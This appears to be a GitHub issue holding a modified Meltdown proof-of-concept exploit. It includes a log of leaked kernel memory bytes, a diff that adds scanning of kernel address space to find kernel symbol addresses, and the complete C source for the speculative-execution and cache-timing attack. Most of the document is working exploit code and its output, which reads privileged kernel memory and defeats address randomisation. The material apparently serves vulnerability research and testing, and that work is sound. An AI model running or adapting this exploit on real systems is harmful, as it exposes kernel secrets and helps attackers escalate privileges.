read ffffffffaec0003e = ff   (score=0/1000)
read ffffffffaec0003f = ff   (score=0/1000)
read ffffffffaec00040 = 5f _ (score=991/1000)
read ffffffffaec00041 = 64 d (score=982/1000)
read ffffffffaec00042 = 65 e (score=354/1000)
read ffffffffaec00043 = 62 b (score=977/1000)
read ffffffffaec00044 = 75 u (score=259/1000)
read ffffffffaec00045 = 67 g (score=985/1000)
read ffffffffaec00046 = ff   (score=0/1000)
read ffffffffaec00047 = ff   (score=0/1000)
read ffffffffaec00048 = ff   (score=0/1000)
read ffffffffaec00049 = ff   (score=0/1000)
read ffffffffaec0004a = ff   (score=0/1000)
read ffffffffaec0004b = ff   (score=0/1000)
read ffffffffaec0004c = ff   (score=0/1000)
read ffffffffaec0004d = ff   (score=0/1000)
read ffffffffaec0004e = ff   (score=0/1000)
read ffffffffaec0004f = ff   (score=0/1000)
read ffffffffaec00050 = ff   (score=0/1000)
read ffffffffaec00051 = ff   (score=0/1000)
read ffffffffaec00052 = ff   (score=0/1000)
read ffffffffaec00053 = ff   (score=0/1000)
read ffffffffaec00054 = ff   (score=0/1000)
read ffffffffaec00055 = ff   (score=0/1000)
read ffffffffaec00056 = ff   (score=0/1000)
read ffffffffaec00057 = ff   (score=0/1000)
read ffffffffaec00058 = ff   (score=0/1000)
read ffffffffaec00059 = ff   (score=0/1000)
read ffffffffaec0005a = ff   (score=0/1000)
read ffffffffaec0005b = ff   (score=0/1000)
read ffffffffaec0005c = ff   (score=0/1000)
read ffffffffaec0005d = ff   (score=0/1000)
read ffffffffaec0005e = ff   (score=0/1000)
read ffffffffaec0005f = ff   (score=0/1000)
read ffffffffaec00060 = 25 % (score=989/1000)
read ffffffffaec00061 = 73 s (score=991/1000)
read ffffffffaec00062 = 20   (score=947/1000)
read ffffffffaec00063 = 76 v (score=957/1000)
read ffffffffaec00064 = 65 e (score=502/1000)
read ffffffffaec00065 = 72 r (score=994/1000)
read ffffffffaec00066 = 73 s (score=990/1000)
read ffffffffaec00067 = 69 i (score=987/1000)
read ffffffffaec00068 = 6f o (score=990/1000)
read ffffffffaec00069 = 6e n (score=876/1000)
read ffffffffaec0006a = 20   (score=951/1000)
read ffffffffaec0006b = 25 % (score=990/1000)
read ffffffffaec0006c = 73 s (score=993/1000)
read ffffffffaec0006d = 20   (score=923/1000)
read ffffffffaec0006e = 28 ( (score=985/1000)
read ffffffffaec0006f = 64 d (score=982/1000)
read ffffffffaec00070 = 65 e (score=316/1000)
read ffffffffaec00071 = 62 b (score=979/1000)
read ffffffffaec00072 = 69 i (score=988/1000)
read ffffffffaec00073 = 61 a (score=975/1000)
read ffffffffaec00074 = 6e n (score=732/1000)
read ffffffffaec00075 = 2d - (score=910/1000)
read ffffffffaec00076 = 6b k (score=986/1000)
read ffffffffaec00077 = 65 e (score=455/1000)
read ffffffffaec00078 = 72 r (score=989/1000)
read ffffffffaec00079 = 6e n (score=747/1000)
read ffffffffaec0007a = 65 e (score=412/1000)
read ffffffffaec0007b = 6c l (score=112/1000)
read ffffffffaec0007c = 40 @ (score=150/1000)
read ffffffffaec0007d = 6c l (score=102/1000)
read ffffffffaec0007e = 69 i (score=987/1000)
read ffffffffaec0007f = 73 s (score=990/1000)
read ffffffffaec00080 = 74 t (score=995/1000)
read ffffffffaec00081 = 73 s (score=989/1000)
read ffffffffaec00082 = 2e . (score=781/1000)
read ffffffffaec00083 = 64 d (score=994/1000)
read ffffffffaec00084 = 65 e (score=766/1000)
read ffffffffaec00085 = 62 b (score=974/1000)
read ffffffffaec00086 = 69 i (score=996/1000)
read ffffffffaec00087 = 61 a (score=984/1000)
read ffffffffaec00088 = 6e n (score=741/1000)
read ffffffffaec00089 = 2e . (score=701/1000)
read ffffffffaec0008a = 6f o (score=989/1000)
read ffffffffaec0008b = 72 r (score=995/1000)
read ffffffffaec0008c = 67 g (score=993/1000)
read ffffffffaec0008d = 29 ) (score=934/1000)
read ffffffffaec0008e = 20   (score=892/1000)
read ffffffffaec0008f = 28 ( (score=989/1000)
read ffffffffaec00090 = 67 g (score=993/1000)
read ffffffffaec00091 = 63 c (score=983/1000)
read ffffffffaec00092 = 63 c (score=980/1000)
read ffffffffaec00093 = 20   (score=917/1000)
read ffffffffaec00094 = 76 v (score=928/1000)
read ffffffffaec00095 = 65 e (score=332/1000)
read ffffffffaec00096 = 72 r (score=996/1000)
read ffffffffaec00097 = 73 s (score=986/1000)
read ffffffffaec00098 = 69 i (score=979/1000)
read ffffffffaec00099 = 6f o (score=990/1000)
read ffffffffaec0009a = 6e n (score=742/1000)
read ffffffffaec0009b = 20   (score=931/1000)
read ffffffffaec0009c = 36 6 (score=968/1000)
read ffffffffaec0009d = 2e . (score=580/1000)
read ffffffffaec0009e = 33 3 (score=988/1000)
read ffffffffaec0009f = 2e . (score=524/1000)
read ffffffffaec000a0 = 30 0 (score=984/1000)
read ffffffffaec000a1 = 20   (score=903/1000)
read ffffffffaec000a2 = 32 2 (score=963/1000)
read ffffffffaec000a3 = 30 0 (score=983/1000)
read ffffffffaec000a4 = 31 1 (score=994/1000)
read ffffffffaec000a5 = 37 7 (score=953/1000)
read ffffffffaec000a6 = 30 0 (score=987/1000)
read ffffffffaec000a7 = 35 5 (score=843/1000)
read ffffffffaec000a8 = 31 1 (score=996/1000)
read ffffffffaec000a9 = 36 6 (score=950/1000)
read ffffffffaec000aa = 20   (score=958/1000)
read ffffffffaec000ab = 28 ( (score=991/1000)
read ffffffffaec000ac = 44 D (score=297/1000)
read ffffffffaec000ad = 65 e (score=642/1000)
read ffffffffaec000ae = 62 b (score=979/1000)
read ffffffffaec000af = 69 i (score=994/1000)
read ffffffffaec000b0 = 61 a (score=982/1000)
read ffffffffaec000b1 = 6e n (score=751/1000)
read ffffffffaec000b2 = 20   (score=946/1000)
read ffffffffaec000b3 = 36 6 (score=963/1000)
read ffffffffaec000b4 = 2e . (score=511/1000)
read ffffffffaec000b5 = 33 3 (score=988/1000)
read ffffffffaec000b6 = 2e . (score=624/1000)
read ffffffffaec000b7 = 30 0 (score=987/1000)
read ffffffffaec000b8 = 2d - (score=943/1000)
read ffffffffaec000b9 = 31 1 (score=994/1000)
read ffffffffaec000ba = 38 8 (score=981/1000)
read ffffffffaec000bb = 29 ) (score=893/1000)
read ffffffffaec000bc = 20   (score=930/1000)
read ffffffffaec000bd = 29 ) (score=964/1000)
read ffffffffaec000be = 20   (score=918/1000)
read ffffffffaec000bf = 25 % (score=992/1000)
read ffffffffaec000c0 = 73 s (score=991/1000)
read ffffffffaec000c1 = ff   (score=0/1000)
read ffffffffaec000c2 = ff   (score=0/1000)
read ffffffffaec000c3 = ff   (score=0/1000)
read ffffffffaec000c4 = ff   (score=0/1000)
read ffffffffaec000c5 = ff   (score=0/1000)
read ffffffffaec000c6 = ff   (score=0/1000)
read ffffffffaec000c7 = ff   (score=0/1000)
read ffffffffaec000c8 = ff   (score=0/1000)
read ffffffffaec000c9 = ff   (score=0/1000)
read ffffffffaec000ca = ff   (score=0/1000)
read ffffffffaec000cb = ff   (score=0/1000)
read ffffffffaec000cc = ff   (score=0/1000)
read ffffffffaec000cd = ff   (score=0/1000)
read ffffffffaec000ce = ff   (score=0/1000)
read ffffffffaec000cf = ff   (score=0/1000)
read ffffffffaec000d0 = ff   (score=0/1000)
read ffffffffaec000d1 = ff   (score=0/1000)
read ffffffffaec000d2 = ff   (score=0/1000)
read ffffffffaec000d3 = ff   (score=0/1000)
read ffffffffaec000d4 = ff   (score=0/1000)
read ffffffffaec000d5 = ff   (score=0/1000)
read ffffffffaec000d6 = ff   (score=0/1000)
read ffffffffaec000d7 = ff   (score=0/1000)
read ffffffffaec000d8 = ff   (score=0/1000)
read ffffffffaec000d9 = ff   (score=0/1000)
read ffffffffaec000da = ff   (score=0/1000)
read ffffffffaec000db = ff   (score=0/1000)
read ffffffffaec000dc = ff   (score=0/1000)
read ffffffffaec000dd = ff   (score=0/1000)
read ffffffffaec000de = ff   (score=0/1000)
read ffffffffaec000df = ff   (score=0/1000)
read ffffffffaec000e0 = 4c L (score=918/1000)
read ffffffffaec000e1 = 69 i (score=992/1000)
read ffffffffaec000e2 = 6e n (score=833/1000)
read ffffffffaec000e3 = 75 u (score=363/1000)
read ffffffffaec000e4 = 78 x (score=902/1000)
read ffffffffaec000e5 = 20   (score=940/1000)
read ffffffffaec000e6 = 76 v (score=940/1000)
read ffffffffaec000e7 = 65 e (score=347/1000)
read ffffffffaec000e8 = 72 r (score=994/1000)
read ffffffffaec000e9 = 73 s (score=995/1000)
read ffffffffaec000ea = 69 i (score=994/1000)
read ffffffffaec000eb = 6f o (score=984/1000)
read ffffffffaec000ec = 6e n (score=674/1000)
read ffffffffaec000ed = 20   (score=921/1000)
read ffffffffaec000ee = 34 4 (score=987/1000)
read ffffffffaec000ef = 2e . (score=497/1000)
read ffffffffaec000f0 = 39 9 (score=598/1000)
read ffffffffaec000f1 = 2e . (score=627/1000)
read ffffffffaec000f2 = 30 0 (score=982/1000)
read ffffffffaec000f3 = 2d - (score=921/1000)
read ffffffffaec000f4 = 33 3 (score=986/1000)
read ffffffffaec000f5 = 2d - (score=936/1000)
read ffffffffaec000f6 = 61 a (score=976/1000)
read ffffffffaec000f7 = 6d m (score=976/1000)
read ffffffffaec000f8 = 64 d (score=986/1000)
read ffffffffaec000f9 = 36 6 (score=965/1000)
read ffffffffaec000fa = 34 4 (score=994/1000)
read ffffffffaec000fb = 20   (score=956/1000)
read ffffffffaec000fc = 28 ( (score=985/1000)
read ffffffffaec000fd = 64 d (score=982/1000)
read ffffffffaec000fe = 65 e (score=333/1000)
read ffffffffaec000ff = 62 b (score=981/1000)
Dumped: ����������������������������������������������������������������_debug��������������������������%s version %s ([email protected]) (gcc version 6.3.0 20170516 (Debian 6.3.0-18) ) %s�������������������������������Linux version 4.9.0-3-amd64 (deb
offset: 0x41 ; found __param_str_initcall_debug: ffffffffaec00041

Diff

diff --git a/meltdown.c b/meltdown.c
index 5cea383..90bd92e 100644
--- a/meltdown.c
+++ b/meltdown.c
@@ -234,9 +234,7 @@ static void pin_cpu0()
 
 int main(int argc, char *argv[])
 {
-	int ret, fd, i, score, is_vulnerable;
 	unsigned long addr, size;
-	static char expected[] = "%s version %s";
 
 	progname = argv[0];
 	if (argc < 3)
@@ -248,6 +246,18 @@ int main(int argc, char *argv[])
 	if (sscanf(argv[2], "%lx", &size) != 1)
 		return usage();
 
+	unsigned long step = 0x100000;
+	unsigned long addr_max = 0xffffffffffffffff;
+	unsigned long i;
+	for (i = addr; i < addr_max; i += step) {
+		if (leak(i, size)) break;
+	}
+}
+
+int leak(unsigned long addr, unsigned long size) {
+	int ret, fd, i, score, is_vulnerable;
+	static char expected[] = "%s version %s";
+
 	memset(target_array, 1, sizeof(target_array));
 
 	ret = set_signal();
@@ -261,6 +271,10 @@ int main(int argc, char *argv[])
 		return -1;
 	}
 
+	char buf[1024];
+	buf[0] = '\0';
+
+	unsigned long start = addr;
 	for (score = 0, i = 0; i < size; i++) {
 		ret = readbyte(fd, addr);
 		if (ret == -1)
@@ -270,6 +284,8 @@ int main(int argc, char *argv[])
 		       ret != 0xff ? hist[ret] : 0,
 		       CYCLES);
 
+		strncat(buf, &ret, 1);
+
 		if (i < sizeof(expected) &&
 		    ret == expected[i])
 			score++;
@@ -277,14 +293,35 @@ int main(int argc, char *argv[])
 		addr++;
 	}
 
+	printf("Dumped: %s\n", buf);
+
+	char * found;
+
+	found = strstr(buf, "debug");
+	unsigned long offset;
+	if (found) {
+		offset = found - buf;
+		printf("offset: %p ; found __param_str_initcall_debug: %lx\n", offset, (offset + (unsigned long)start));
+		return 1;
+	}
+
+	found = strstr(buf, expected);
+	if (found) {
+		offset = found - buf;
+		printf("offset: %p ; found linux_proc_banner: %lx\n", offset, (offset + (unsigned long)start));
+		return 1;
+	}
+
 	close(fd);
 
 	is_vulnerable = score > min(size, sizeof(expected)) / 2;
 
-	if (is_vulnerable)
+	if (is_vulnerable) {
 		fprintf(stderr, "VULNERABLE\n");
+		exit(is_vulnerable);
+	}
 	else
 		fprintf(stderr, "NOT VULNERABLE\n");
 
-	exit(is_vulnerable);
+	return is_vulnerable;
 }

Source

#define _GNU_SOURCE

#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <ucontext.h>
#include <unistd.h>
#include <fcntl.h>
#include <ctype.h>
#include <sched.h>

#include <x86intrin.h>

#include "rdtscp.h"

//#define DEBUG 1


#if !(defined(__x86_64__) || defined(__i386__))
# error "Only x86-64 and i386 are supported at the moment"
#endif


#define TARGET_OFFSET	12
#define TARGET_SIZE	(1 << TARGET_OFFSET)
#define BITS_READ	8
#define VARIANTS_READ	(1 << BITS_READ)

static char target_array[VARIANTS_READ * TARGET_SIZE];

void clflush_target(void)
{
	int i;

	for (i = 0; i < VARIANTS_READ; i++)
		_mm_clflush(&target_array[i * TARGET_SIZE]);
}

extern char stopspeculate[];

static void __attribute__((noinline))
speculate(unsigned long addr)
{
#ifdef __x86_64__
	asm volatile (
		"1:\n\t"

		".rept 300\n\t"
		"add $0x141, %%rax\n\t"
		".endr\n\t"

		"movzx (%[addr]), %%eax\n\t"
		"shl $12, %%rax\n\t"
		"jz 1b\n\t"
		"movzx (%[target], %%rax, 1), %%rbx\n"

		"stopspeculate: \n\t"
		"nop\n\t"
		:
		: [target] "r" (target_array),
		  [addr] "r" (addr)
		: "rax", "rbx"
	);
#else /* ifdef __x86_64__ */
	asm volatile (
		"1:\n\t"

		".rept 300\n\t"
		"add $0x141, %%eax\n\t"
		".endr\n\t"

		"movzx (%[addr]), %%eax\n\t"
		"shl $12, %%eax\n\t"
		"jz 1b\n\t"
		"movzx (%[target], %%eax, 1), %%ebx\n"


		"stopspeculate: \n\t"
		"nop\n\t"
		:
		: [target] "r" (target_array),
		  [addr] "r" (addr)
		: "rax", "rbx"
	);
#endif
}


static int cache_hit_threshold;
static int hist[VARIANTS_READ];
void check(void)
{
	int i, time, mix_i;
	volatile char *addr;

	for (i = 0; i < VARIANTS_READ; i++) {
		mix_i = ((i * 167) + 13) & 255;

		addr = &target_array[mix_i * TARGET_SIZE];
		time = get_access_time(addr);

		if (time <= cache_hit_threshold)
			hist[mix_i]++;
	}
}

void sigsegv(int sig, siginfo_t *siginfo, void *context)
{
	ucontext_t *ucontext = context;

#ifdef __x86_64__
	ucontext->uc_mcontext.gregs[REG_RIP] = (unsigned long)stopspeculate;
#else
	ucontext->uc_mcontext.gregs[REG_EIP] = (unsigned long)stopspeculate;
#endif
	return;
}

int set_signal(void)
{
	struct sigaction act = {
		.sa_sigaction = sigsegv,
		.sa_flags = SA_SIGINFO,
	};

	return sigaction(SIGSEGV, &act, NULL);
}

#define CYCLES 1000
int readbyte(int fd, unsigned long addr)
{
	int i, ret = 0, max = -1, maxi = -1;
	static char buf[256];

	memset(hist, 0, sizeof(hist));

	for (i = 0; i < CYCLES; i++) {
		ret = pread(fd, buf, sizeof(buf), 0);
		if (ret < 0) {
			perror("pread");
			break;
		}

		clflush_target();

		_mm_mfence();

		speculate(addr);
		check();
	}

#ifdef DEBUG
	for (i = 0; i < VARIANTS_READ; i++)
		if (hist[i] > 0)
			printf("addr %lx hist[%x] = %d\n", addr, i, hist[i]);
#endif

	for (i = 1; i < VARIANTS_READ; i++) {
		if (!isprint(i))
			continue;
		if (hist[i] && hist[i] > max) {
			max = hist[i];
			maxi = i;
		}
	}

	return maxi;
}

static char *progname;
int usage(void)
{
	printf("%s: [hexaddr] [size]\n", progname);
	return 2;
}

static int mysqrt(long val)
{
	int root = val / 2, prevroot = 0, i = 0;

	while (prevroot != root && i++ < 100) {
		prevroot = root;
		root = (val / root + root) / 2;
	}

	return root;
}

#define ESTIMATE_CYCLES	1000000
static void
set_cache_hit_threshold(void)
{
	long cached, uncached, i;

	if (0) {
		cache_hit_threshold = 80;
		return;
	}

	for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
		cached += get_access_time(target_array);

	for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
		cached += get_access_time(target_array);

	for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
		_mm_clflush(target_array);
		uncached += get_access_time(target_array);
	}

	cached /= ESTIMATE_CYCLES;
	uncached /= ESTIMATE_CYCLES;

	cache_hit_threshold = mysqrt(cached * uncached);

	printf("cached = %ld, uncached = %ld, threshold %d\n",
	       cached, uncached, cache_hit_threshold);
}

static int min(int a, int b)
{
	return a < b ? a : b;
}

static void pin_cpu0()
{
	cpu_set_t mask;

	/* PIN to CPU0 */
	CPU_ZERO(&mask);
	CPU_SET(0, &mask);
	sched_setaffinity(0, sizeof(cpu_set_t), &mask);
}

int main(int argc, char *argv[])
{
	unsigned long addr, size;

	progname = argv[0];
	if (argc < 3)
		return usage();

	if (sscanf(argv[1], "%lx", &addr) != 1)
		return usage();

	if (sscanf(argv[2], "%lx", &size) != 1)
		return usage();

	unsigned long step = 0x100000;
	unsigned long addr_max = 0xffffffffffffffff;
	unsigned long i;
	for (i = addr; i < addr_max; i += step) {
		if (leak(i, size)) break;
	}
}

int leak(unsigned long addr, unsigned long size) {
	int ret, fd, i, score, is_vulnerable;
	static char expected[] = "%s version %s";

	memset(target_array, 1, sizeof(target_array));

	ret = set_signal();
	pin_cpu0();

	set_cache_hit_threshold();

	fd = open("/proc/version", O_RDONLY);
	if (fd < 0) {
		perror("open");
		return -1;
	}

	char buf[1024];
	buf[0] = '\0';

	unsigned long start = addr;
	for (score = 0, i = 0; i < size; i++) {
		ret = readbyte(fd, addr);
		if (ret == -1)
			ret = 0xff;
		printf("read %lx = %x %c (score=%d/%d)\n",
		       addr, ret, isprint(ret) ? ret : ' ',
		       ret != 0xff ? hist[ret] : 0,
		       CYCLES);

		strncat(buf, &ret, 1);

		if (i < sizeof(expected) &&
		    ret == expected[i])
			score++;

		addr++;
	}

	printf("Dumped: %s\n", buf);

	char * found;

	found = strstr(buf, "debug");
	unsigned long offset;
	if (found) {
		offset = found - buf;
		printf("offset: %p ; found __param_str_initcall_debug: %lx\n", offset, (offset + (unsigned long)start));
		return 1;
	}

	found = strstr(buf, expected);
	if (found) {
		offset = found - buf;
		printf("offset: %p ; found linux_proc_banner: %lx\n", offset, (offset + (unsigned long)start));
		return 1;
	}

	close(fd);

	is_vulnerable = score > min(size, sizeof(expected)) / 2;

	if (is_vulnerable) {
		fprintf(stderr, "VULNERABLE\n");
		exit(is_vulnerable);
	}
	else
		fprintf(stderr, "NOT VULNERABLE\n");

	return is_vulnerable;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@bcoles